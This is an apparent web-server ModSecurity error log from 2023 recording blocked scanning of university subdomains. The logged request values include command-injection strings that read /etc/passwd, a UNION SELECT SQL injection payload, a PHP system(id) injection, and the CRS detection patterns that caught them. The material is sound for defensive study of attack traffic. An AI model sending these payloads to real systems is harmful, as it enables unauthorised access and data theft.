[Tue Aug 29 11:32:25.360493 2023] [:error] [pid 880] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|httpd\\\\.conf|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:type. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:type: |cat/etc/passwd||"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "ft.unla.ac.id"] [uri "/webadm/"] [unique_id "ZO102cCo-f0AAANwNzsAAAAb"]
[Tue Aug 29 11:32:25.369962 2023] [:error] [pid 1044] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|httpd\\\\.conf|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:c. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:c: cat/etc/passwd"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "pusatbahasa.unla.ac.id"] [uri "/plus/flink.php"] [unique_id "ZO102cCo-f0AAAQUIEwAAAA2"]
[Tue Aug 29 11:32:25.370872 2023] [:error] [pid 963] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|httpd\\\\.conf|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:type. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:type: |cat/etc/passwd||"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "journal.unla.ac.id"] [uri "/webadm/"] [unique_id "ZO102cCo-f0AAAPDoFcAAAAP"]
[Tue Aug 29 11:32:25.375856 2023] [:error] [pid 1009] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|httpd\\\\.conf|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:type. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:type: |cat/etc/passwd||"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "pusatbahasa.unla.ac.id"] [uri "/webadm/"] [unique_id "ZO102cCo-f0AAAPxBYkAAAAS"]
[Tue Aug 29 11:32:25.376058 2023] [:error] [pid 1091] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|httpd\\\\.conf|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:type. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:type: |cat/etc/passwd||"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "informatika.unla.ac.id"] [uri "/webadm/"] [unique_id "ZO102cCo-f0AAARD1OUAAAAH"]
[Tue Aug 29 11:32:25.379825 2023] [:error] [pid 1088] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|httpd\\\\.conf|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:c. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:c: cat/etc/passwd"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "informatika.unla.ac.id"] [uri "/plus/flink.php"] [unique_id "ZO102cCo-f0AAARA7ZcAAAAA"]
[Tue Aug 29 11:32:25.390979 2023] [:error] [pid 1044] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|httpd\\\\.conf|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:c. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:c: cat/etc/passwd"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "journal.unla.ac.id"] [uri "/plus/flink.php"] [unique_id "ZO102cCo-f0AAAQUIE0AAAA2"]
[Tue Aug 29 11:32:26.697085 2023] [:error] [pid 1044] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|httpd\\\\.conf|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:c. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:c: cat/etc/passwd"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "www.unla.ac.id"] [uri "/plus/flink.php"] [unique_id "ZO102sCo-f0AAAQUIFMAAAA2"]
[Tue Aug 29 11:32:26.856650 2023] [:error] [pid 880] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|httpd\\\\.conf|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:type. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:type: |cat/etc/passwd||"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "www.unla.ac.id"] [uri "/webadm/"] [unique_id "ZO102sCo-f0AAANwNz4AAAAb"]
[Tue Aug 29 11:32:27.511898 2023] [:error] [pid 963] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|httpd\\\\.conf|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:cmd. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:cmd: cat/etc/passwd"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "unla.ac.id"] [uri "/imc/javax.faces.resource/dynamiccontent.properties.xhtml"] [unique_id "ZO1028Co-f0AAAPDoF8AAAAP"]
[Tue Aug 29 11:32:27.568815 2023] [:error] [pid 1094] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|httpd\\\\.conf|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:cmd. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:cmd: cat/etc/passwd"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "informatika.unla.ac.id"] [uri "/imc/javax.faces.resource/dynamiccontent.properties.xhtml"] [unique_id "ZO1028Co-f0AAARGwccAAAAL"]
[Tue Aug 29 11:32:27.573269 2023] [:error] [pid 963] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|httpd\\\\.conf|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:cmd. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:cmd: cat/etc/passwd"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "journal.unla.ac.id"] [uri "/imc/javax.faces.resource/dynamiccontent.properties.xhtml"] [unique_id "ZO1028Co-f0AAAPDoGIAAAAP"]
[Tue Aug 29 11:32:27.592213 2023] [:error] [pid 994] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|httpd\\\\.conf|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:cmd. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:cmd: cat/etc/passwd"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "ft.unla.ac.id"] [uri "/imc/javax.faces.resource/dynamiccontent.properties.xhtml"] [unique_id "ZO1028Co-f0AAAPiBsgAAAAB"]
[Tue Aug 29 11:32:27.991253 2023] [:error] [pid 1096] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|httpd\\\\.conf|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:cmd. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:cmd: cat/etc/passwd"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "pusatbahasa.unla.ac.id"] [uri "/imc/javax.faces.resource/dynamiccontent.properties.xhtml"] [unique_id "ZO1028Co-f0AAARIwIMAAAAO"]
[Tue Aug 29 11:32:28.379374 2023] [:error] [pid 1095] [client 143.42.78.27] ModSecurity: Rule 7fe1c58deef8 [id "973302"][file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_41_xss_attacks.conf"][line "309"] - Execution error - PCRE limits exceeded (-8): (null). [hostname "ft.unla.ac.id"] [uri "/imc/javax.faces.resource/dynamiccontent.properties.xhtml"] [unique_id "ZO103MCo-f0AAARH7HQAAAAM"]
[Tue Aug 29 11:32:28.384407 2023] [:error] [pid 880] [client 143.42.78.27] ModSecurity: Rule 7fe1c58deef8 [id "973302"][file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_41_xss_attacks.conf"][line "309"] - Execution error - PCRE limits exceeded (-8): (null). [hostname "journal.unla.ac.id"] [uri "/imc/javax.faces.resource/dynamiccontent.properties.xhtml"] [unique_id "ZO103MCo-f0AAANwN0kAAAAb"]
[Tue Aug 29 11:32:28.449088 2023] [:error] [pid 880] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|httpd\\\\.conf|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:cmd. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:cmd: cat/etc/passwd"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "www.unla.ac.id"] [uri "/imc/javax.faces.resource/dynamiccontent.properties.xhtml"] [unique_id "ZO103MCo-f0AAANwN0wAAAAb"]
[Tue Aug 29 11:32:28.476016 2023] [:error] [pid 963] [client 143.42.78.27] ModSecurity: Rule 7fe1c58deef8 [id "973302"][file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_41_xss_attacks.conf"][line "309"] - Execution error - PCRE limits exceeded (-8): (null). [hostname "pusatbahasa.unla.ac.id"] [uri "/imc/javax.faces.resource/dynamiccontent.properties.xhtml"] [unique_id "ZO103MCo-f0AAAPDoGoAAAAP"]
[Tue Aug 29 11:32:30.303200 2023] [:error] [pid 1044] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(/\\\\*!?|\\\\*/|[';]--|--[\\\\s\\\\r\\\\n\\\\v\\\\f]|(?:--[^-]*?-)|([^\\\\-&])#.*?[\\\\s\\\\r\\\\n\\\\v\\\\f]|;?\\\\x00)" at ARGS:parent. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_41_sql_injection_attacks.conf"] [line "49"] [id "981231"] [rev "2"] [msg "SQL Comment Sequence Detected."] [data "Matched Data: --  found within ARGS:parent: \\x22 UNION SELECT NULL,NULL,CONCAT_WS(0x203a20,USER(),DATABASE(),VERSION(),md5(999999999)),NULL,NULL,NULL,NULL,NULL-- aa"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "8"] [accuracy "8"] [tag "OWASP_CRS/WEB_ATTACK/SQL_INJECTION"] [tag "WASCTC/WASC-19"] [tag "OWASP_TOP_10/A1"] [tag "OWASP_AppSensor/CIE1"] [tag "PCI/6.5.2"] [hostname "unla.ac.id"] [uri "/plugins/editors/jckeditor/plugins/jtreelink/dialogs/links.php"] [unique_id "ZO103sCo-f0AAAQUIGIAAAA2"]
[Tue Aug 29 11:32:30.306799 2023] [:error] [pid 1088] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(/\\\\*!?|\\\\*/|[';]--|--[\\\\s\\\\r\\\\n\\\\v\\\\f]|(?:--[^-]*?-)|([^\\\\-&])#.*?[\\\\s\\\\r\\\\n\\\\v\\\\f]|;?\\\\x00)" at ARGS:parent. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_41_sql_injection_attacks.conf"] [line "49"] [id "981231"] [rev "2"] [msg "SQL Comment Sequence Detected."] [data "Matched Data: --  found within ARGS:parent: \\x22 UNION SELECT NULL,NULL,CONCAT_WS(0x203a20,USER(),DATABASE(),VERSION(),md5(999999999)),NULL,NULL,NULL,NULL,NULL-- aa"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "8"] [accuracy "8"] [tag "OWASP_CRS/WEB_ATTACK/SQL_INJECTION"] [tag "WASCTC/WASC-19"] [tag "OWASP_TOP_10/A1"] [tag "OWASP_AppSensor/CIE1"] [tag "PCI/6.5.2"] [hostname "ft.unla.ac.id"] [uri "/plugins/editors/jckeditor/plugins/jtreelink/dialogs/links.php"] [unique_id "ZO103sCo-f0AAARA7ZkAAAAA"]
[Tue Aug 29 11:32:30.306827 2023] [:error] [pid 880] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(/\\\\*!?|\\\\*/|[';]--|--[\\\\s\\\\r\\\\n\\\\v\\\\f]|(?:--[^-]*?-)|([^\\\\-&])#.*?[\\\\s\\\\r\\\\n\\\\v\\\\f]|;?\\\\x00)" at ARGS:parent. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_41_sql_injection_attacks.conf"] [line "49"] [id "981231"] [rev "2"] [msg "SQL Comment Sequence Detected."] [data "Matched Data: --  found within ARGS:parent: \\x22 UNION SELECT NULL,NULL,CONCAT_WS(0x203a20,USER(),DATABASE(),VERSION(),md5(999999999)),NULL,NULL,NULL,NULL,NULL-- aa"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "8"] [accuracy "8"] [tag "OWASP_CRS/WEB_ATTACK/SQL_INJECTION"] [tag "WASCTC/WASC-19"] [tag "OWASP_TOP_10/A1"] [tag "OWASP_AppSensor/CIE1"] [tag "PCI/6.5.2"] [hostname "journal.unla.ac.id"] [uri "/plugins/editors/jckeditor/plugins/jtreelink/dialogs/links.php"] [unique_id "ZO103sCo-f0AAANwN08AAAAb"]
[Tue Aug 29 11:32:30.311823 2023] [:error] [pid 1085] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(/\\\\*!?|\\\\*/|[';]--|--[\\\\s\\\\r\\\\n\\\\v\\\\f]|(?:--[^-]*?-)|([^\\\\-&])#.*?[\\\\s\\\\r\\\\n\\\\v\\\\f]|;?\\\\x00)" at ARGS:parent. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_41_sql_injection_attacks.conf"] [line "49"] [id "981231"] [rev "2"] [msg "SQL Comment Sequence Detected."] [data "Matched Data: --  found within ARGS:parent: \\x22 UNION SELECT NULL,NULL,CONCAT_WS(0x203a20,USER(),DATABASE(),VERSION(),md5(999999999)),NULL,NULL,NULL,NULL,NULL-- aa"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "8"] [accuracy "8"] [tag "OWASP_CRS/WEB_ATTACK/SQL_INJECTION"] [tag "WASCTC/WASC-19"] [tag "OWASP_TOP_10/A1"] [tag "OWASP_AppSensor/CIE1"] [tag "PCI/6.5.2"] [hostname "pusatbahasa.unla.ac.id"] [uri "/plugins/editors/jckeditor/plugins/jtreelink/dialogs/links.php"] [unique_id "ZO103sCo-f0AAAQ9H4EAAAAK"]
[Tue Aug 29 11:32:30.314248 2023] [:error] [pid 1095] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(/\\\\*!?|\\\\*/|[';]--|--[\\\\s\\\\r\\\\n\\\\v\\\\f]|(?:--[^-]*?-)|([^\\\\-&])#.*?[\\\\s\\\\r\\\\n\\\\v\\\\f]|;?\\\\x00)" at ARGS:parent. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_41_sql_injection_attacks.conf"] [line "49"] [id "981231"] [rev "2"] [msg "SQL Comment Sequence Detected."] [data "Matched Data: --  found within ARGS:parent: \\x22 UNION SELECT NULL,NULL,CONCAT_WS(0x203a20,USER(),DATABASE(),VERSION(),md5(999999999)),NULL,NULL,NULL,NULL,NULL-- aa"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "8"] [accuracy "8"] [tag "OWASP_CRS/WEB_ATTACK/SQL_INJECTION"] [tag "WASCTC/WASC-19"] [tag "OWASP_TOP_10/A1"] [tag "OWASP_AppSensor/CIE1"] [tag "PCI/6.5.2"] [hostname "informatika.unla.ac.id"] [uri "/plugins/editors/jckeditor/plugins/jtreelink/dialogs/links.php"] [unique_id "ZO103sCo-f0AAARH7HUAAAAM"]
[Tue Aug 29 11:32:30.348838 2023] [:error] [pid 1084] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(/\\\\*!?|\\\\*/|[';]--|--[\\\\s\\\\r\\\\n\\\\v\\\\f]|(?:--[^-]*?-)|([^\\\\-&])#.*?[\\\\s\\\\r\\\\n\\\\v\\\\f]|;?\\\\x00)" at ARGS:parent. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_41_sql_injection_attacks.conf"] [line "49"] [id "981231"] [rev "2"] [msg "SQL Comment Sequence Detected."] [data "Matched Data: --  found within ARGS:parent: \\x22 UNION SELECT NULL,NULL,CONCAT_WS(0x203a20,USER(),DATABASE(),VERSION(),md5(999999999)),NULL,NULL,NULL,NULL,NULL-- aa"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "8"] [accuracy "8"] [tag "OWASP_CRS/WEB_ATTACK/SQL_INJECTION"] [tag "WASCTC/WASC-19"] [tag "OWASP_TOP_10/A1"] [tag "OWASP_AppSensor/CIE1"] [tag "PCI/6.5.2"] [hostname "www.unla.ac.id"] [uri "/plugins/editors/jckeditor/plugins/jtreelink/dialogs/links.php"] [unique_id "ZO103sCo-f0AAAQ83U0AAAAI"]
[Tue Aug 29 11:32:31.308810 2023] [:error] [pid 1100] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(^[\\"'`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98;]+|[\\"'`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98;]+$)" at ARGS:SPOOLDIR. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_41_sql_injection_attacks.conf"] [line "64"] [id "981318"] [rev "2"] [msg "SQL Injection Attack: Common Injection Testing Detected"] [data "Matched Data: \\x22 found within ARGS:SPOOLDIR: test\\x22.system(id).\\x22"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [tag "OWASP_CRS/WEB_ATTACK/SQL_INJECTION"] [tag "WASCTC/WASC-19"] [tag "OWASP_TOP_10/A1"] [tag "OWASP_AppSensor/CIE1"] [tag "PCI/6.5.2"] [hostname "ft.unla.ac.id"] [uri "/index.php"] [unique_id "ZO1038Co-f0AAARMMbsAAAAR"]
[Tue Aug 29 11:32:31.309058 2023] [:error] [pid 854] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(^[\\"'`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98;]+|[\\"'`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98;]+$)" at ARGS:SPOOLDIR. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_41_sql_injection_attacks.conf"] [line "64"] [id "981318"] [rev "2"] [msg "SQL Injection Attack: Common Injection Testing Detected"] [data "Matched Data: \\x22 found within ARGS:SPOOLDIR: test\\x22.system(id).\\x22"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [tag "OWASP_CRS/WEB_ATTACK/SQL_INJECTION"] [tag "WASCTC/WASC-19"] [tag "OWASP_TOP_10/A1"] [tag "OWASP_AppSensor/CIE1"] [tag "PCI/6.5.2"] [hostname "journal.unla.ac.id"] [uri "/index.php"] [unique_id "ZO1038Co-f0AAANWgbwAAAAG"]
[Tue Aug 29 11:32:31.310640 2023] [:error] [pid 893] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(^[\\"'`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98;]+|[\\"'`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98;]+$)" at ARGS:SPOOLDIR. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_41_sql_injection_attacks.conf"] [line "64"] [id "981318"] [rev "2"] [msg "SQL Injection Attack: Common Injection Testing Detected"] [data "Matched Data: \\x22 found within ARGS:SPOOLDIR: test\\x22.system(id).\\x22"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [tag "OWASP_CRS/WEB_ATTACK/SQL_INJECTION"] [tag "WASCTC/WASC-19"] [tag "OWASP_TOP_10/A1"] [tag "OWASP_AppSensor/CIE1"] [tag "PCI/6.5.2"] [hostname "unla.ac.id"] [uri "/index.php"] [unique_id "ZO1038Co-f0AAAN9sWsAAAAJ"]
[Tue Aug 29 11:32:31.311608 2023] [:error] [pid 1091] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(^[\\"'`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98;]+|[\\"'`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98;]+$)" at ARGS:SPOOLDIR. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_41_sql_injection_attacks.conf"] [line "64"] [id "981318"] [rev "2"] [msg "SQL Injection Attack: Common Injection Testing Detected"] [data "Matched Data: \\x22 found within ARGS:SPOOLDIR: test\\x22.system(id).\\x22"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [tag "OWASP_CRS/WEB_ATTACK/SQL_INJECTION"] [tag "WASCTC/WASC-19"] [tag "OWASP_TOP_10/A1"] [tag "OWASP_AppSensor/CIE1"] [tag "PCI/6.5.2"] [hostname "informatika.unla.ac.id"] [uri "/index.php"] [unique_id "ZO1038Co-f0AAARD1OkAAAAH"]
[Tue Aug 29 11:32:31.312596 2023] [:error] [pid 1084] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(^[\\"'`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98;]+|[\\"'`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98;]+$)" at ARGS:SPOOLDIR. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_41_sql_injection_attacks.conf"] [line "64"] [id "981318"] [rev "2"] [msg "SQL Injection Attack: Common Injection Testing Detected"] [data "Matched Data: \\x22 found within ARGS:SPOOLDIR: test\\x22.system(id).\\x22"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [tag "OWASP_CRS/WEB_ATTACK/SQL_INJECTION"] [tag "WASCTC/WASC-19"] [tag "OWASP_TOP_10/A1"] [tag "OWASP_AppSensor/CIE1"] [tag "PCI/6.5.2"] [hostname "pusatbahasa.unla.ac.id"] [uri "/index.php"] [unique_id "ZO1038Co-f0AAAQ83U4AAAAI"]
